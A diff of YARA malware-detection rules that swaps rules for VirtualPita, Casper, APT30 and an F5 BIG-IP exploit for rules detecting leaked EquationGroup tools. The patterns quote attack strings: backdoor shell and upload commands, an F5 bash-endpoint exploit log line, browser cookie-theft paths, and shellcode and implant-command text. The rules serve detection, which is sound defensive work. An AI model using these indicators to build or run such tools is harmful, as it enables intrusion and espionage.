-		$x = { 4? 8b 4? ?? c6 00 48 4? 8b 4? ?? 4? 83 c0 05 c6 00 49 4? 8b 4? ?? 4? 83 c0 01 c6 00 49 4? 8b 4? ?? 4? 83 c0 06 c6 00 4c 4? 8b 4? ?? 4? 83 c0 02 c6 00 53 4? 8b 4? ?? 4? 83 c0 07 c6 00 45 4? 8b 4? ?? 4? 83 c0 03 c6 00 54 4? 8b 4? ?? 4? 83 c0 08 c6 00 3d 4? 8b 4? ?? 4? 83 c0 04 c6 00 46 4? 8b 4? ?? 4? 83 c0 09 c6 00 00 4? 8b 7? ?? e8 }
+		$x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
+		$x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
+		$x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
+		$x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Scanner : FILE
 {
 	meta:
-		description = "Finds opcodes from 401f1c to 401f4f in fe34b7c071d96dac498b72a4a07cb246 to decode text with multiple XORs"
-		author = "Mandiant"
-		id = "58d4db75-fcd5-50c2-93ba-a8a4718ac0f6"
-		date = "2022-10-01"
-		modified = "2025-12-19"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L39-L50"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "603c82d0-2e65-5353-a109-5f69697cffa4"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2149-L2166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "aaf2ff682c619d2a254fe069d477654a161658db6315239f1b956141b6a72c01"
+		logic_hash = "7f2ee4ac260b78764573187c501ed27fbfdf573e618f15dbd307177afa670605"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
 
 	strings:
-		$x = { 4? 8b 4? ?? 4? 83 c1 30 4? 8b 4? ?? 4? 8b 10 8b 4? ?? 4? 98 4? 8b 04 ?? ?? ?? ?? ?? 4? 31 c2 4? 8b 4? ?? 4? 83 c0 28 4? 8b 00 4? c1 e8 10 0f b6 c0 4? 98 4? 8b 04 }
+		$x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
+		$x2 = "Usage: %s typeofscan IP_address" fullword ascii
+		$x3 = "# scanning ip  %d.%d.%d.%d" fullword ascii
+		$x4 = "Welcome to the network scanning tool" fullword ascii
+		$x5 = "***** %s ***** (length %d)" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_Hunting_Python_Backdoor_Commandparser_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mcl_Ntmemory_Std : FILE
 {
 	meta:
-		description = "Finds strings indicative of the vmsyslog.py python backdoor."
-		author = "Mandiant"
-		id = "15cbca01-24e6-5538-bcfd-c3222337aaf5"
-		date = "2022-10-01"
-		modified = "2025-12-19"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc3886_virtualpita.yar#L52-L67"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "608218a8-7642-5ec4-8c07-87248649f022"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2168-L2183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "61ab3f6401d60ec36cd3ac980a8deb75"
-		logic_hash = "4c6e65d73543b2ae8e1c0e9a919501a3624fb06d4355a296ae8abb6762d37a1f"
-		score = 50
-		quality = 60
+		logic_hash = "5d3c76cf0ca0f798e1ca3c0a1b88c3bb425f1c36439842c4c33247dfcb44a877"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
 
 	strings:
-		$key1 = "self.conn.readInt8()" ascii
-		$key2 = "upload" ascii
-		$key3 = "download" ascii
-		$key4 = "shell" ascii
-		$key5 = "execute" ascii
-		$re1 = /def\srun.{0,20}command\s?=\s?self\.conn\.readInt8\(\).{,75}upload.{,75}download.{,75}shell.{,75}execute/s
+		$op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 }
+		$op2 = { 44 24 33 6f c6 44 24 34 77 c6 }
+		$op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e }
 
 	condition:
-		filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_LOG_F5_BIGIP_Exploitation_Artefacts_CVE_2021_22986_Mar21_1 : LOG
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Tacothief : FILE
 {
 	meta:
-		description = "Detects forensic artefacts indicating successful exploitation of F5 BIG IP appliances as reported by NCCGroup"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e109ebeb-e5c3-5999-95dc-0963ed8461a6"
-		date = "2021-03-20"
+		id = "7be7ca05-c2c7-5a7d-8b1b-e6741b4397b9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_f5_bigip_cve_2021_22986_log.yar#L2-L15"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2185-L2198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "748bb429d4a086e2890773558ea502ef06f507aed5f0f70470e2cd97a3fd5007"
-		score = 80
+		logic_hash = "565d94ac0dd65de0926d11ae08ee78f14dcb211ca97c77c39f394fb36890fc6f"
+		score = 75
 		quality = 85
-		tags = "LOG"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
 
 	strings:
-		$x1 = "\",\"method\":\"POST\",\"uri\":\"http://localhost:8100/mgmt/tm/util/bash\",\"status\":200," ascii
-		$x2 = "[com.f5.rest.app.RestServerServlet] X-F5-Auth-Token doesn't have value, so skipping" ascii
+		$x1 = "File too large!  Must be less than 655360 bytes." fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Casper_Backdoor_X86 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntevt : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9e54f00c-74a7-56cc-87e5-8dec1233cbb5"
-		date = "2015-03-05"
-		modified = "2023-01-27"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L4-L35"
+		id = "fd25f703-ff3e-5e75-b1eb-24a658a1ac8e"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2200-L2219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
-		logic_hash = "027457a3d86c0a7924fd6eb09c4a753cc846ba45f0b04257d9eec396bbc27f75"
-		score = 80
+		logic_hash = "29572cce9af51adf12db019f885f868fd77ff9034a6944a6286a4d2a0988842a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
 
 	strings:
-		$s1 = "\"svchost.exe\"" fullword wide
-		$s2 = "firefox.exe" fullword ascii
-		$s3 = "\"Host Process for Windows Services\"" fullword wide
-		$x1 = "\\Users\\*" ascii
-		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii
-		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii
-		$x4 = "\\Documents and Settings\\*" ascii
-		$y1 = "%s; %S=%S" fullword wide
-		$y2 = "%s; %s=%s" fullword ascii
-		$y3 = "Cookie: %s=%s" fullword ascii
-		$y4 = "http://%S:%d" fullword wide
-		$z1 = "http://google.com/" ascii
-		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
-		$z3 = "Operating System\"" fullword wide
+		$x1 = "c:\\ntevt.pdb" fullword ascii
+		$s1 = "ARASPVU" fullword ascii
+		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
+		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
+		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
 
 	condition:
-		( filesize < 250KB and all of ( $s* ) ) or ( 3 of ( $x* ) and 2 of ( $y* ) and 2 of ( $z* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_Casper_EXE_Dropper
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Processes_Target : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a901d045-6f9b-57e8-8347-6f78178b7231"
-		date = "2015-03-05"
+		id = "1b910f46-5d19-5ecd-9647-10ee9ee7b012"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L37-L58"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2221-L2236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
-		logic_hash = "8ffba5598078fdadf2d9e8ee7fe0fef8b3b89517490a379d46cab33cd0036d6e"
-		score = 80
+		logic_hash = "e9e26224b7eafc999c9638d4591a45297e3293b0e90e63c2d207ee52848c4ce2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
 
 	strings:
-		$s0 = "<Command>" fullword ascii
-		$s1 = "</Command>" fullword ascii
-		$s2 = "\" /d \"" fullword ascii
-		$s4 = "'%s' %s" fullword ascii
-		$s5 = "nKERNEL32.DLL" fullword wide
-		$s6 = "@ReturnValue" fullword wide
-		$s7 = "ID: 0x%x" fullword ascii
-		$s8 = "Name: %S" fullword ascii
+		$s1 = "Select * from Win32_Process" fullword ascii
+		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
+		$s5 = "%4ls%2ls%2ls%2ls%2ls%2ls.%11l[0-9]%1l[+-]%6s" fullword wide
 
 	condition:
-		7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Casper_Included_Strings : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_St_Lp : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "34ba474d-0858-534a-8f32-db5a709e8814"
-		date = "2015-03-06"
+		id = "2d4ee801-c7f4-5476-8368-89aa2863ba96"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L60-L83"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2238-L2254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8796f45e459747db6bc08f362db7b152242f9f5bda3b72ddfc739cc9dcdfc55f"
-		score = 50
+		logic_hash = "38a48a931856e0eb8e16b7902f5e494b50f8895d4221b5359fc3339d1b52eb8e"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3b6f756cca096548dcad2b6c241c1dafd16806c060bec82a530f4d38755286a2"
 
 	strings:
-		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
-		$a1 = "& SYSTEMINFO) ELSE EXIT"
-		$c1 = "domcommon.exe" wide fullword
-		$c2 = "jpic.gov.sy" fullword
-		$c3 = "aiomgr.exe" wide fullword
-		$c4 = "perfaudio.dat" fullword
-		$c5 = "Casper_DLL.dll" fullword
-		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 }
-		$c7 = "{4216567A-4512-9825-7745F856}" fullword
+		$x1 = "Previous command: set injection processes (status=0x%x)" fullword ascii
+		$x2 = "Secondary injection process is <null> [no secondary process will be used]" fullword ascii
+		$x3 = "Enter the address to be used as the spoofed IP source address (xxx.xxx.xxx.xxx) -> " fullword ascii
+		$x4 = "E: Execute a Command on the Implant" fullword ascii
 
 	condition:
-		all of ( $a* ) or uint16( 0 ) == 0x5a4d and ( 1 of ( $c* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Casper_Systeminformation_Output
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Epwrapper : FILE
 {
 	meta:
-		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
-		date = "2015-03-06"
+		id = "81b72f7f-ba5a-5f45-b77c-071cfb4571d3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/VRJNLo"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_casper.yar#L85-L104"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2256-L2271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "83c6216bc3e7fadfe81b9bbaca7b14e3398e972f8298c99a8eb576a40e4b4e1b"
-		score = 70
+		logic_hash = "9a1a54cd3fef3db9a20f3be25336fcbabe0d993403f001a04a02b5dbfd629543"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a8eed17665ee22198670e22458eb8c9028ff77130788f24f44986cce6cebff8d"
 
 	strings:
-		$a0 = "***** SYSTEM INFORMATION ******"
-		$a1 = "***** SECURITY INFORMATION ******"
-		$a2 = "Antivirus: "
-		$a3 = "Firewall: "
-		$a4 = "***** EXECUTION CONTEXT ******"
-		$a5 = "Identity: "
-		$a6 = "<CONFIG TIMESTAMP="
+		$x1 = "* Failed to get remote TCP socket address" fullword wide
+		$x2 = "* Failed to get 'LPStart' export" fullword wide
+		$s5 = "Usage: %ls <logdir> <dll_search_path> <dll_to_load_path> <socket>" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_H : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_2000 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1908e985-9634-51dc-8972-53afa13c26a3"
-		date = "2015-04-13"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L10-L26"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2273-L2290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4affe7dc01efc4d6c25aaae4679bc1f8fddd97794e351d30501eaeb8e1d1dea"
+		logic_hash = "dfcd7d928c921dbe7162712ca74a105a938fd9ac675faaaa228d05139b2077de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a4c8752f3e7fde0139421b8d5713b29c720685d"
-		hash2 = "4350e906d590dca5fcc90ed3215467524e0a4e3d"
+		hash1 = "f9ea8ff5985b94f635d03f3aab9ad4fb4e8c2ad931137dba4f8ee8a809421b91"
 
 	strings:
-		$s0 = "\\Temp1020.txt" ascii
-		$s1 = "Xmd.Txe" fullword ascii
-		$s2 = "\\Internet Exp1orer" ascii
+		$s1 = "0M1U1Z1p1" fullword ascii
+		$op1 = { f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 }
+		$op2 = { 36 c6 45 e6 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 }
+		$op3 = { c6 45 e8 65 c6 45 e9 70 c6 45 ea 74 c6 45 eb 5f }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dllload_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "821a2de9-48c4-58d8-acc4-1e25025ab5cf"
-		date = "2015-04-13"
+		id = "9def0814-c86a-5fae-abc2-4185596a74aa"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L28-L45"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2292-L2309"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0359ffbef6a752ee1a54447b26e272f4a5a35167"
-		logic_hash = "e34dbb90fc868b0619d3d2aa1b6176252836a6ae72e6f52b1eba632054f7c272"
+		logic_hash = "ab50ad9e01c55b3f40e98e6e2cf77c1ad7d6d6ec81a56bbb2263a6e05912e272"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a42d5201af655e43cefef30d7511697e6faa2469dc4a74bc10aa060b522a1cf5"
 
 	strings:
-		$s0 = "ForZRLnkWordDlg.EXE" fullword wide
-		$s1 = "ForZRLnkWordDlg Microsoft " fullword wide
-		$s9 = "ForZRLnkWordDlg 1.0 " fullword wide
-		$s11 = "ForZRLnkWordDlg" fullword wide
-		$s12 = " (C) 2011" fullword wide
+		$s1 = "BzWKJD+" fullword ascii
+		$op1 = { 44 24 6c 6c 88 5c 24 6d }
+		$op2 = { 44 24 54 63 c6 44 24 55 74 c6 44 24 56 69 }
+		$op3 = { 44 24 5c 6c c6 44 24 5d 65 c6 44 24 5e }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_EXPA : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62e81385-26f5-545d-92ff-6604ff4d0186"
-		date = "2015-04-13"
+		id = "106efe9b-f70f-51cf-bbb2-b9bf61df1dd1"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L47-L64"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2311-L2327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d0320144e65c9af0052f8dee0419e8deed91b61b"
-		logic_hash = "ee61ec1fdf27fa21bcc235fce0ab8dc74968b39a747648ce828fb4826cf1d234"
+		logic_hash = "2aa4ee5b128714cfa7f5d29f7ef110e1b18fb7bc21351444b2472ff74c4139d3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2017176d3b5731a188eca1b71c50fb938c19d6260c9ff58c7c9534e317d315f8"
 
 	strings:
-		$s5 = "Software\\Mic" ascii
-		$s6 = "HHOSTR" ascii
-		$s9 = "ThEugh" fullword ascii
-		$s10 = "Moziea/" ascii
-		$s12 = "%s%s(X-" ascii
+		$x1 = "* The target is IIS 6.0 but is not running content indexing servicess," fullword ascii
+		$x2 = "--ver 6 --sp <service_pack> --lang <language> --attack shellcode_option[s]sL" fullword ascii
+		$x3 = "By default, the shellcode will attempt to immediately connect s$" fullword ascii
+		$x4 = "UNEXPECTED SHELLCODE CONFIGURATION ERRORs" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_C : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Target : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "25ec8d54-9875-5bf5-abc9-296f18f3c5e5"
-		date = "2015-04-13"
+		id = "608e5244-2d3f-573c-a0de-44637051f4ba"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L66-L88"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2329-L2345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b969565eac3b6f548318aae4edc8d8851f522a6c263bcaf2a466ff0ca9af78a4"
+		logic_hash = "3eedb6abb09989784a7dc5e721f9901e936f2c0241967b48858e5e5897b9f24a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8667f635fe089c5e2c666b3fe22eaf3ff8590a69"
-		hash2 = "0c4fcef3b583d0ffffc2b14b9297d3a4"
-		hash3 = "37aee58655f5859e60ece6b249107b87"
-		hash4 = "4154548e1f8e9e7eb39d48a4cd75bcd1"
-		hash5 = "a2e0203e665976a13cdffb4416917250"
-		hash6 = "b4ae0004094b37a40978ef06f311a75e"
-		hash7 = "e39756bc99ee1b05e5ee92a1cdd5faf4"
+		hash1 = "4a649ca8da7b5499821a768c650a397216cdc95d826862bf30fcc4725ce8587f"
 
 	strings:
-		$s0 = "MYUSER32.dll" fullword ascii
-		$s1 = "MYADVAPI32.dll" fullword ascii
-		$s2 = "MYWSOCK32.dll" fullword ascii
-		$s3 = "MYMSVCRT.dll" fullword ascii
+		$s1 = "Win32_Process" fullword ascii
+		$s2 = "\\\\%ls\\root\\cimv2" fullword wide
+		$op1 = { 83 7b 18 01 75 12 83 63 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_DS_Parselogs : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5c6afde-0ab5-54ed-8d18-5ad477a527d7"
-		date = "2015-04-13"
+		id = "1906c0fc-3fbc-5995-8789-f1c02e574672"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L90-L108"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2347-L2362"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75367d8b506031df5923c2d8d7f1b9f643a123cd"
-		logic_hash = "ec9542acb583bd5812d561bea70e89e0fcddc1eaef14d3ea5b8ad29711ed17ae"
+		logic_hash = "e4c35476b512378d1e3c7e7e3e9dae16adb0d4de4ecab143d034110836c11d0d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0228691d63038b072cdbf50782990d505507757efbfa87655bb2182cf6375956"
 
 	strings:
-		$s0 = "GetStartupIn" ascii
-		$s1 = "enMutex" ascii
-		$s2 = "tpsvimi" ascii
